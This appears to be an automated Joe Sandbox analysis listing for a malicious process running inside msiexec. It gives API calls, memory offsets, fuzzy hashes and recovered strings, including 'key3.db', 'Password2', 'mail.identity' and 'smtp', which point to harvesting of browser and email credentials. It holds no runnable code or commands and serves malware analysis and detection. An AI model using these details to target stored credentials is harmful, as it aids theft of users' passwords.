                                                              • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                              • GetSysColor.USER32(00000005), ref: 004107A6
                                                              • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                              • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                              • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                              • String ID:
                                                              • API String ID: 2775283111-0
                                                              • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                              • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                              • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: winSeekFile$winTruncate1$winTruncate2
                                                              • API String ID: 885266447-2471937615
                                                              • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                              • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                                              • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                                              APIs
                                                              • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                                              • CloseHandle.KERNEL32(?,?,00406C55,00000000,?,00000000,?), ref: 00406B11
                                                                • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407909
                                                                • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407917
                                                                • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$??2@??3@CloseHandleReadSize
                                                              • String ID: Ul@$key3.db
                                                              • API String ID: 3013762397-1563549157
                                                              • Opcode ID: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                              • Instruction ID: 1a03c8060d8a16f0d136589656c0636480a797a3ae37aee6ed6b4138e5904ac9
                                                              • Instruction Fuzzy Hash: EA1181B1D00624ABCB10AF25DC8588E7FB5EF45364B15C177F80AEB291D638ED61CB98
                                                              APIs
                                                              • _strcmpi.MSVCRT ref: 0040E134
                                                              • _strcmpi.MSVCRT ref: 0040E14D
                                                              • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _strcmpi$_mbscpy
                                                              • String ID: smtp
                                                              • API String ID: 2625860049-60245459
                                                              • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                              • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                              • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                              APIs
                                                              • memset.MSVCRT ref: 0040C28C
                                                              • SetFocus.USER32(?,?), ref: 0040C314
                                                                • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FocusMessagePostmemset
                                                              • String ID: S_@$l
                                                              • API String ID: 3436799508-4018740455
                                                              • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                              • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                              • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                              APIs
                                                              • memset.MSVCRT ref: 004092C0
                                                              • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                              • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                              Strings
                                                              • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileString_mbscpymemset
                                                              • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                              • API String ID: 408644273-3424043681
                                                              • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                              • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                              • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy
                                                              • String ID: C^@$X$ini
                                                              • API String ID: 714388716-917056472
                                                              • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                              • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                              • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                              APIs
                                                                • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                              • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                              • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                              • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                              • String ID: MS Sans Serif
                                                              • API String ID: 3492281209-168460110
                                                              • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                              • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                              • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ClassName_strcmpimemset
                                                              • String ID: edit
                                                              • API String ID: 275601554-2167791130
                                                              • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                              • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                              • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: strlen$_mbscat
                                                              • String ID: 3CD
                                                              • API String ID: 3951308622-1938365332
                                                              • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                              • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                              • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscat$_mbscpy
                                                              • String ID: Password2
                                                              • API String ID: 2600922555-1856559283
                                                              • Opcode ID: 8d83a753bd2278aecac4212cdf66134528e9acc94ce1ae697df6f496e3d29f98
                                                              • Instruction ID: daa9138b3154c9efe9c83666f212cf2f945430f9457ac718319f22168f8299cd
                                                              • Instruction Fuzzy Hash: 5BC01202A4667032210275555D07F8E5818CE9279B704005BB90832113D61D965542EF
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                              • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                              • API String ID: 2574300362-543337301
                                                              • Opcode ID: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                                              • Instruction ID: ef400fb4b1d3fc6097741d3c7ce2aeca37e2dca3c44752f23935f4d935815712
                                                              • Instruction Fuzzy Hash: C9D0C9F8D063099AE7005BA1AD297167AB4E719312F041536A540A5263EBBCD094CE1D
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: rows deleted
                                                              • API String ID: 2221118986-571615504
                                                              • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                              • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                              • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                              APIs
                                                              • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041BC7F
                                                              • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BC95
                                                              • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BCA4
                                                              • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041BCEC
                                                              • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041BD07
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memcmp
                                                              • String ID:
                                                              • API String ID: 3384217055-0
                                                              • Opcode ID: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                              • Instruction ID: 8228d9f6412a3e952053f7d3f56c39de874a44e07f5fc6281cc9d0b5593e34d3
                                                              • Instruction Fuzzy Hash: C8215172E102896BEB19DBA5D846FAF73FCEB84700F00446AB511D7281FB28E644C765
                                                              APIs
                                                                • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                              • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                              • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@$memset
                                                              • String ID:
                                                              • API String ID: 1860491036-0
                                                              • Opcode ID: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                              • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                              • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                              APIs
                                                              • memset.MSVCRT ref: 004048C2
                                                              • memset.MSVCRT ref: 004048D6
                                                              • memset.MSVCRT ref: 004048EA
                                                              • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                              • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$memcpy
                                                              • String ID:
                                                              • API String ID: 368790112-0
                                                              • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                              • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                                              • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                                              APIs
                                                              • memset.MSVCRT ref: 0040D2C2
                                                              • memset.MSVCRT ref: 0040D2D8
                                                              • memset.MSVCRT ref: 0040D2EA
                                                              • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                              • memset.MSVCRT ref: 0040D319
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$memcpy
                                                              • String ID:
                                                              • API String ID: 368790112-0
                                                              • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                              • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                              • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                              • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                              APIs
                                                              • __allrem.LIBCMT ref: 00425850
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                              • __allrem.LIBCMT ref: 00425933
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                              • String ID:
                                                              • API String ID: 1992179935-0
                                                              • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                              • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                                              • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                              • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                                              APIs
                                                              Strings
                                                              • too many SQL variables, xrefs: 0042C6FD
                                                              • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                              • API String ID: 2221118986-515162456
                                                              • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                              • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                              • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                              • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                              APIs
                                                                • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                              • memset.MSVCRT ref: 004026AD
                                                                • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                              • LocalFree.KERNEL32(?), ref: 004027A6
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                              • String ID:
                                                              • API String ID: 3503910906-0
                                                              • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                              • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                              • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                              • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                              APIs
                                                              • memset.MSVCRT ref: 0040C922
                                                              • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                              • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                              • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Message$MenuPostSendStringmemset
                                                              • String ID:
                                                              • API String ID: 3798638045-0
                                                              • Opcode ID: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                              • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                                              • Opcode Fuzzy Hash: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                              • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                                              APIs
                                                                • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409E0E
                                                                • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
                                                              • strlen.MSVCRT ref: 0040B60B
                                                              • atoi.MSVCRT(?), ref: 0040B619
                                                              • _mbsicmp.MSVCRT ref: 0040B66C
                                                              • _mbsicmp.MSVCRT ref: 0040B67F
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbsicmp$??2@??3@atoistrlen
                                                              • String ID:
                                                              • API String ID: 4107816708-0
                                                              • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                              • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                              • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                              • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                              • _gmtime64.MSVCRT ref: 00411437
                                                              • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                              • strftime.MSVCRT ref: 00411476
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                              • String ID:
                                                              • API String ID: 1886415126-0
                                                              • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                              • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                              • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                              • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: strlen
                                                              • String ID: >$>$>
                                                              • API String ID: 39653677-3911187716
                                                              • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                              • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                              • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                              • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                              APIs
                                                              • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                              • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                              • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: @
                                                              • API String ID: 3510742995-2766056989
                                                              • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                              • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                              • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                              • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _strcmpi
                                                              • String ID: C@$mail.identity
                                                              • API String ID: 1439213657-721921413
                                                              • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                              • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                              • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                              • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                              APIs
                                                              • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                              • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                              • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                              • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindLoadLockSizeof
                                                              • String ID:
                                                              • API String ID: 3473537107-0
